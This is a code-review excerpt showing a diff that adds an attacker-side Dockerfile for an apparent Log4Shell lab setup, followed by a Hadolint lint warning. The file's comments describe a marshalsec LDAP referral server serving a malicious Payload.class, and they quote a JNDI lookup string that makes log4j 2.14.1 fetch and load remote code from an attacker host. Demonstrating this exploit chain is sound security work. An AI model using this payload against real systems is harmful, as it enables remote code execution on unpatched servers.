example/log4j-chain/attacker/Dockerfile

```
@@ -0,0 +1,33 @@
+# Attacker-side container — runs marshalsec LDAP referral server +
+# serves the compiled Payload.class over HTTP on port 8888.
+# The JNDI URL embedded in the attacker's payload is:
+#   ${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}
+# log4j 2.14.1 follows the LDAP referral to the HTTP URL and loads the class.
+
+FROM maven:3.9-eclipse-temurin-11 AS build
+WORKDIR /src
+# Build marshalsec from upstream.
+RUN apt-get update && apt-get install -y --no-install-recommends git && \
```

Hadolint (2.14.0)

[warning] Use WORKDIR to switch to a directory

(DL3003)